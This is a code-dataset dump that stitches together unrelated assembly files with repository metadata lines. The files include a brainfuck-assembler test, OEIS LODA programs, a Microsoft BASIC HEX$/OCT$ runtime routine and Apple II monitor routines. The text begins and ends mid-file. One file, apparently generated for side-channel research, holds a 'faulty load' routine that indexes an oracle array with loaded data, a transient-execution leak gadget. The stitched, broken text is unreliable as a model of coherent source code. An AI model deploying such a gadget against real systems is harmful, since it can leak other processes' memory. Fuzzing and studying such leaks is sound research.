32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
| 35.513514 | 2,999 | 0.656621 |
13b6d5a99ca70f0e0dd236d4e6f4d1766860d24a | 29 | asm | Assembly | test/same-dest.asm | kspalaiologos/asmbf | c98a51d61724a46855de291a27d68a49a034810b | [
"MIT"
] | 67 | 2020-08-03T06:26:35.000Z | 2022-03-24T19:50:51.000Z | test/same-dest.asm | pyautogui/asmbf | 37c54a8a62df2fc4bab28bdeb43237b4905cbecd | [
"MIT"
] | 55 | 2019-10-02T19:37:08.000Z | 2020-06-12T19:40:53.000Z | test/same-dest.asm | pyautogui/asmbf | 37c54a8a62df2fc4bab28bdeb43237b4905cbecd | [
"MIT"
] | 9 | 2019-05-18T11:59:41.000Z | 2020-06-21T20:40:25.000Z | txt "abcd"
rcl r1, r1
out r1
| 7.25 | 10 | 0.655172 |
7f2eca38046a8c5f454d8141010d540c495c0db8 | 8,059 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_665.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_665.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca.log_21829_665.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1df7c, %rdi
nop
nop
nop
nop
nop
dec %rax
mov $0x6162636465666768, %r14
movq %r14, %xmm1
movups %xmm1, (%rdi)
nop
and $16504, %r9
lea addresses_WT_ht+0x3958, %rsi
lea addresses_UC_ht+0xdad8, %rdi
nop
nop
nop
nop
sub $53063, %r9
mov $65, %rcx
rep movsw
nop
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_A_ht+0x49ec, %rax
nop
nop
nop
nop
inc %r8
mov $0x6162636465666768, %r9
movq %r9, (%rax)
cmp %rdi, %rdi
lea addresses_D_ht+0x10958, %r8
cmp %r14, %r14
movups (%r8), %xmm6
vpextrq $1, %xmm6, %rcx
nop
nop
nop
nop
sub %rdi, %rdi
lea addresses_UC_ht+0x14058, %rcx
nop
nop
nop
and $41092, %r9
movb $0x61, (%rcx)
nop
nop
nop
nop
nop
and %rsi, %rsi
lea addresses_A_ht+0xdf2c, %rcx
nop
nop
cmp $28045, %r8
mov (%rcx), %esi
xor %rsi, %rsi
lea addresses_UC_ht+0x182f8, %r14
nop
nop
nop
nop
nop
inc %r8
vmovups (%r14), %ymm5
vextracti128 $1, %ymm5, %xmm5
vpextrq $0, %xmm5, %rsi
nop
nop
nop
nop
inc %rsi
lea addresses_WC_ht+0xc02e, %rcx
clflush (%rcx)
nop
nop
nop
sub $63598, %r14
mov $0x6162636465666768, %rsi
movq %rsi, %xmm7
and $0xffffffffffffffc0, %rcx
vmovntdq %ymm7, (%rcx)
nop
add %r8, %r8
lea addresses_normal_ht+0x9d58, %rcx
nop
nop
nop
nop
nop
xor $15230, %r8
mov $0x6162636465666768, %rax
movq %rax, %xmm6
movups %xmm6, (%rcx)
nop
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_WC_ht+0x14bd8, %rsi
lea addresses_WT_ht+0x5348, %rdi
clflush (%rdi)
and $58320, %r9
mov $77, %rcx
rep movsl
nop
nop
nop
nop
nop
add %rsi, %rsi
lea addresses_WC_ht+0x14ef4, %rcx
nop
nop
nop
nop
and %rdi, %rdi
and $0xffffffffffffffc0, %rcx
movntdqa (%rcx), %xmm6
vpextrq $1, %xmm6, %r9
nop
nop
nop
nop
nop
xor %r8, %r8
lea addresses_normal_ht+0x1cb74, %r9
clflush (%r9)
nop
nop
nop
cmp $65353, %r14
mov (%r9), %eax
nop
nop
nop
nop
nop
sub %r9, %r9
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r8
pop %r14
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r13
push %r14
push %r15
push %r9
push %rax
// Store
lea addresses_US+0x2f58, %r15
nop
cmp $2732, %r13
mov $0x5152535455565758, %r10
movq %r10, (%r15)
nop
sub %r10, %r10
// Store
mov $0xc40, %r9
nop
nop
nop
nop
sub %r12, %r12
movw $0x5152, (%r9)
nop
nop
cmp $14114, %r12
// Store
lea addresses_WT+0x1e18, %r15
nop
nop
cmp %r10, %r10
movl $0x51525354, (%r15)
nop
xor $12999, %r9
// Store
lea addresses_A+0x2798, %r13
and %rax, %rax
movw $0x5152, (%r13)
nop
nop
nop
and %r14, %r14
// Faulty Load
lea addresses_PSE+0x958, %r9
xor %r12, %r12
mov (%r9), %r14d
lea oracles, %r15
and $0xff, %r14
shlq $12, %r14
mov (%r15,%r14,1), %r14
pop %rax
pop %r9
pop %r15
pop %r14
pop %r13
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_PSE'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 9, 'AVXalign': False, 'same': False, 'size': 8, 'NT': False, 'type': 'addresses_US'}}
{'OP': 'STOR', 'dst': {'congruent': 3, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_P'}}
{'OP': 'STOR', 'dst': {'congruent': 6, 'AVXalign': False, 'same': False, 'size': 4, 'NT': True, 'type': 'addresses_WT'}}
{'OP': 'STOR', 'dst': {'congruent': 3, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_A'}}
[Faulty Load]
{'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 4, 'NT': False, 'type': 'addresses_PSE'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'congruent': 1, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_WT_ht'}}
{'src': {'congruent': 11, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'congruent': 2, 'same': False, 'type': 'addresses_UC_ht'}}
{'OP': 'STOR', 'dst': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 8, 'NT': False, 'type': 'addresses_A_ht'}}
{'src': {'congruent': 11, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 8, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_UC_ht'}}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 4, 'NT': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 5, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 32, 'NT': True, 'type': 'addresses_WC_ht'}}
{'OP': 'STOR', 'dst': {'congruent': 10, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_normal_ht'}}
{'src': {'congruent': 6, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WT_ht'}}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 16, 'NT': True, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 4, 'NT': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'33': 21829}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
| 31.357977 | 2,999 | 0.653679 |
f6648c4e971c53f3b3d34fa2f6ed92754f6c1794 | 830 | asm | Assembly | oeis/142/A142674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/142/A142674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/142/A142674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A142674: Primes congruent to 14 mod 57.
; Submitted by Jon Maiga
; 71,641,983,1097,1439,1553,1667,2237,2351,2579,2693,3491,3719,3833,3947,4289,4517,4973,5087,5657,6113,6569,6911,7253,7481,7823,7937,8849,8963,9419,9533,10103,10331,10559,11243,11471,11699,11813,11927,12041,12269,12497,12611,12953,13523,13751,14207,14321,14549,14891,15233,15461,15803,16487,16829,16943,17627,18311,18539,19793,20021,20249,20477,21503,21617,22073,22643,22871,23099,23327,23669,24239,24809,24923,25037,26177,26633,26861,27431,27773,28001,28229,28571,29027,29483,30509,30851,31079,31193
mov $1,35
mov $2,$0
add $2,2
pow $2,2
lpb $2
sub $2,1
mov $3,$1
mul $3,2
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
add $1,57
mov $4,$0
max $4,0
cmp $4,$0
mul $2,$4
lpe
mov $0,$1
mul $0,2
sub $0,113
| 34.583333 | 500 | 0.73012 |
f5bb544e04ca47bedbddcc4eddcee68fa954138e | 3,451 | asm | Assembly | 45/runtime/rt/hexoct.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/runtime/rt/hexoct.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | 45/runtime/rt/hexoct.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | TITLE HEXOCT - OCT, HEX functions
;***
; HEXOCT - OCT, HEX functions
;
; Copyright <C> 1986, Microsoft Corporation
;
;Purpose:
;
; BASIC Syntax mapping to included runtime entry points:
;
;
; - HEX$ Function - calls B$FHEX with 4-byte integer parm.
;
; v$ = HEX$(n)
; |
; B$FHEX
;
;
; - OCT$ Function - calls B$FOCT with 4-byte integer parm.
;
; v$ = OCT$(n)
; |
; B$FOCT
;
; - BIN$ Function - calls B$FBIN with 4-byte integer parm.
;
; v$ = BIN$(n)
; |
; B$FBIN
;
;******************************************************************************
INCLUDE switch.inc
INCLUDE rmacros.inc ; Runtime Macro Defintions
USESEG ST_TEXT
USESEG NH_TEXT
USESEG _DATA
INCLUDE seg.inc
sBegin NH_TEXT
externNP B$STALCTMPCPY
sEnd NH_TEXT
assumes CS,ST_TEXT
sBegin ST_TEXT
externNP B$FrameAFE ; advanced feature error + frame setup
;***
;B$FBIN,B$FHEX,B$FOCT - Convert I4 number to binary, hex, or octal string
;
;Purpose:
; Runtime Entry points.
; Create a string of minimum length (no leading zeros) that represents
; the value of the number in binary, octal or hex.
;Entry:
; parmD = I4 Integer value to be converted to a string
;Exit:
; AX = Address of string descriptor
;Uses:
; Per convention.
;Exceptions:
; B$ERR_OM
;****
cProc B$FBIN,<PUBLIC,FAR> ;BIN$ function
cBegin <nogen>
JMP B$FrameAFE ; advanced feature error + frame setup
cEnd <nogen> ;and convert to string
cProc B$FHEX,<PUBLIC,FAR> ;HEX$ function
cBegin <nogen>
MOV CX,0F04H ;CH=mask, CL=shift count
JMP SHORT CONVERT ;use common conversion routine to pick param
cEnd <nogen> ;and convert to string
cProc B$FOCT,<PUBLIC,FAR> ;OCT$ function
cBegin <nogen>
MOV CX,0703H ;CH=mask, CL=shift count
cEnd <nogen> ;fall into conversion routine
.erre ID_SSEQDS ;assumes SS=DS
cProc CONVERT,<FAR>,<ES,DI>
parmD Val ;I4 parameter for above routines
localW BufTop ;Top of string buffer
localV Buf,30 ;32 byte buffer for string
cBegin
PUSH DS ;set ES=DS
POP ES
MOV BX,WORD PTR[Val];DX:BX = I4 to be converted
MOV DX,WORD PTR[Val+2]
XOR AH,AH ;init char count
LEA DI,BufTop ;set up to build string on stack
STD ;move from high to low
; At this point the following conditions exist:
; AH = Character count
; CH = Mask
; CL = Shift count
; DX:BX = I4 to convert
; DI = pointer to digit buffer
; Perform the conversion by shifting DX:BX by CL bits and masm out
; unused bits with CH. Take this number and convert to ascii char
; representing digit. Stuff the char in the buffer, bump the char
; count and continue until no non-zero digits remain.
CONVERT_LOOP:
MOV AL,BL ;Bring number to accumulator
AND AL,CH ;Mask down to the bits that count
;Trick 6-byte hex conversion
ADD AL,90H
DAA
ADC AL,40H
DAA ;Number in hex now
STOSB ;Save in string
INC AH ;Count the digits
PUSH CX ;Save mask/shift count
XOR CH,CH ;zero out mask, leaving shift count
SHIFT_LOOP:
SHR DX,1 ;shift low bit into carry, zero high bit
RCR BX,1 ;rotate carry into low word
LOOP SHIFT_LOOP ;repeat shift count times
POP CX ;recover mask/shift count
PUSH BX
OR BX,DX ;is rest of I4 = 0?
POP BX
JNZ CONVERT_LOOP ;brif not, convert next digit
CLD ;Restore direction UP
INC DI ;Point to most significant digit
MOV BL,AH ;Digit count in BX (BH already zero)
MOV DX,DI ;Put string pointer in DX
CALL B$STALCTMPCPY ;Allocate string and copy data in
XCHG AX,BX ;return string descriptor in AX
cEnd
sEnd ST_TEXT
END
| 24.475177 | 79 | 0.692843 |
13cc29c87f5efce63246ead2875f6444c523d88c | 513 | asm | Assembly | programs/oeis/280/A280098.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/280/A280098.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/280/A280098.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A280098: The sum of the divisors of 24*n - 1, divided by 24.
; 1,2,3,5,6,7,7,8,11,10,11,14,13,17,15,16,19,18,28,20,21,24,25,31,25,30,27,31,35,30,31,35,38,41,35,36,37,38,54,46,41,45,43,53,49,46,57,48,62,55,51,55,56,76,55,60,57,63,71,60,80,62,63,77,65,66,67,78,83,74,77,79,78,93,86,76,77,78,95,85,85,94,91,112,85,86,87,88,124,96,95,92,98,126,99,114,105,98,130,100
mul $0,2
add $0,1
mul $0,2
add $0,1
mul $0,6
add $0,4
seq $0,203 ; a(n) = sigma(n), the sum of the divisors of n. Also called sigma_1(n).
div $0,24
| 42.75 | 300 | 0.649123 |
50a0b630c3e13432551088549002cd7cb814db33 | 9,507 | asm | Assembly | audit/monitor-routines.asm | zellyn/a2audit | b5bb6fa18dfab8f3e96432d799f9e772f4a7824b | [
"MIT"
] | 22 | 2016-11-13T04:56:49.000Z | 2021-12-04T20:04:49.000Z | audit/monitor-routines.asm | cbeust/a2audit | 5c377d6bd06294a4326a590caa5ffdb290068903 | [
"MIT"
] | 11 | 2017-02-24T20:48:59.000Z | 2020-09-21T18:15:19.000Z | audit/monitor-routines.asm | cbeust/a2audit | 5c377d6bd06294a4326a590caa5ffdb290068903 | [
"MIT"
] | 3 | 2017-02-24T17:43:39.000Z | 2021-01-09T16:55:20.000Z | !zone monitor {
.LOC0 = $00
.LOC1 = $01
.WNDLFT = $20
.WNDWDTH = $21
.WNDTOP = $22
.WNDBTM = $23
.CH = $24
.CV = $25
.GBASL = $26
.GBASH = $27
.BASL = $28
.BASH = $29
.BAS2L = $2A
.BAS2H = $2B
.V2 = $2D
.MASK = $2E
.COLOR = $30
.INVFLG = $32
.YSAV1 = $35
.CSWL = $36
.CSWH = $37
.KSWL = $38
.KSWH = $39
.A2L = $3E
.STATUS = $48
.RNDL = $4E
.RNDH = $4F
.IOADR = $C000
.KBD = $C000
.KBDSTRB = $C010
.SPKR = $C030
.LORES = $C056
.LOWSCR = $C054
.TXTSET = $C051
.TXTCLR = $C050
.MIXSET = $C053
.PLOT LSR ;Y-COORD/2
PHP ;SAVE LSB IN CARRY
JSR .GBASCALC ;CALC BASE ADR IN GBASL,H
PLP ;RESTORE LSB FROM CARRY
LDA #$0F ;MASK $0F IF EVEN
BCC .RTMASK
ADC #$E0 ;MASK $F0 IF ODD
.RTMASK STA .MASK
.PLOT1 LDA (.GBASL),Y ;DATA
EOR .COLOR ; EOR COLOR
AND .MASK ; AND MASK
EOR (.GBASL),Y ; EOR DATA
STA (.GBASL),Y ; TO DATA
RTS
.VLINEZ ADC #$01 ;NEXT Y-COORD
.VLINE PHA ; SAVE ON STACK
JSR .PLOT ; PLOT SQUARE
PLA
CMP .V2 ;DONE?
BCC .VLINEZ ; NO, LOOP
.RTS1 RTS
.CLRSCR LDY #$2F ;MAX Y, FULL SCRN CLR
BNE .CLRSC2 ;ALWAYS TAKEN
.CLRTOP LDY #$27 ;MAX Y, TOP SCREEN CLR
.CLRSC2 STY .V2 ;STORE AS BOTTOM COORD
; FOR VLINE CALLS
LDY #$27 ;RIGHTMOST X-COORD (COLUMN)
.CLRSC3 LDA #$00 ;TOP COORD FOR VLINE CALLS
STA .COLOR ;CLEAR COLOR (BLACK)
JSR .VLINE ;DRAW VLINE
DEY ;NEXT LEFTMOST X-COORD
BPL .CLRSC3 ;LOOP UNTIL DONE
RTS
.GBASCALC PHA ;FOR INPUT 000DEFGH
LSR
AND #$03
ORA #$04 ; GENERATE GBASH=000001FG
STA .GBASH
PLA ; AND GBASL=HDEDE000
AND #$18
BCC .GBCALC
ADC #$7F
.GBCALC STA .GBASL
ASL
ASL
ORA .GBASL
STA .GBASL
RTS
PRNTYX TYA
.PRNTAX JSR PRBYTE ;OUTPUT TARGET ADR
.PRNTX TXA ; OF BRANCH AND RETURN
JMP PRBYTE
.INIT LDA #$00 ;CLR STATUS FOR DEBUG
STA .STATUS ; SOFTWARE
LDA .LORES
LDA .LOWSCR ;INIT VIDEO MODE
.SETTXT LDA .TXTSET ;SET FOR TEXT MODE
LDA #$00 ; FULL SCREEN WINDOW
BEQ .SETWND
.SETGR LDA .TXTCLR ;SET FOR GRAPHICS MODE
LDA .MIXSET ; LOWER 4 LINES AS
JSR .CLRTOP ; TEXT WINDOW
LDA #$14
.SETWND STA .WNDTOP ;SET FOR 40 COL WINDOW
LDA #$00 ; TOP IN A-REG,
STA .WNDLFT ; BTTM AT LINE 24
LDA #$28
STA .WNDWDTH
LDA #$18
STA .WNDBTM ; VTAB TO ROW 23
LDA #$17
.TABV STA .CV ;VTABS TO ROW IN A-REG
JMP .VTAB
.BASCALC PHA ;CALC BASE ADR IN BASL,H
LSR ; FOR GIVEN LINE NO
AND #$03 ; 0<=LINE NO.<=$17
ORA #$04 ;ARG=000ABCDE, GENERATE
STA .BASH ; BASH=000001CD
PLA ; AND
AND #$18 ; BASL=EABAB000
BCC .BSCLC2
ADC #$7F
.BSCLC2 STA .BASL
ASL
ASL
ORA .BASL
STA .BASL
RTS
.BELL1 CMP #$87 ;BELL CHAR? (CNTRL-G)
BNE .RTS2B ; NO, RETURN
LDA #$40 ;DELAY .01 SECONDS
JSR .WAIT
LDY #$C0
.BELL2 LDA #$0C ;TOGGLE SPEAKER AT
JSR .WAIT ; 1 KHZ FOR .1 SEC.
LDA .SPKR
DEY
BNE .BELL2
.RTS2B RTS
.STOADV LDY .CH ;CURSOR H INDEX TO Y-REG
STA (.BASL),Y ;STORE CHAR IN LINE
.ADVANCE INC .CH ;INCREMENT CURSOR H INDEX
LDA .CH ; (MOVE RIGHT)
CMP .WNDWDTH ;BEYOND WINDOW WIDTH?
BCS .CR ; YES CR TO NEXT LINE
.RTS3 RTS ; NO,RETURN
.VIDOUT CMP #$A0 ;CONTROL CHAR?
BCS .STOADV ; NO,OUTPUT IT.
TAY ;INVERSE VIDEO?
BPL .STOADV ; YES, OUTPUT IT.
CMP #$8D ;CR?
BEQ .CR ; YES.
CMP #$8A ;LINE FEED?
BEQ .LF ; IF SO, DO IT.
CMP #$88 ;BACK SPACE? (CNTRL-H)
BNE .BELL1 ; NO, CHECK FOR BELL.
.BS DEC .CH ;DECREMENT CURSOR H INDEX
BPL .RTS3 ;IF POS, OK. ELSE MOVE UP
LDA .WNDWDTH ;SET CH TO WNDWDTH-1
STA .CH
DEC .CH ;(RIGHTMOST SCREEN POS)
.UP LDA .WNDTOP ;CURSOR V INDEX
CMP .CV
BCS .RTS4 ;IF TOP LINE THEN RETURN
DEC .CV ;DEC CURSOR V-INDEX
.VTAB LDA .CV ;GET CURSOR V-INDEX
.VTABZ JSR .BASCALC ;GENERATE BASE ADR
ADC .WNDLFT ;ADD WINDOW LEFT INDEX
STA .BASL ;TO BASL
.RTS4 RTS
.CLEOP1 PHA ;SAVE CURRENT LINE ON STK
JSR .VTABZ ;CALC BASE ADDRESS
JSR .CLEOLZ ;CLEAR TO EOL, SET CARRY
LDY #$00 ;CLEAR FROM H INDEX=0 FOR REST
PLA ;INCREMENT CURRENT LINE
ADC #$00 ;(CARRY IS SET)
CMP .WNDBTM ;DONE TO BOTTOM OF WINDOW?
BCC .CLEOP1 ; NO, KEEP CLEARING LINES
BCS .VTAB ; YES, TAB TO CURRENT LINE
HOME LDA .WNDTOP ;INIT CURSOR V
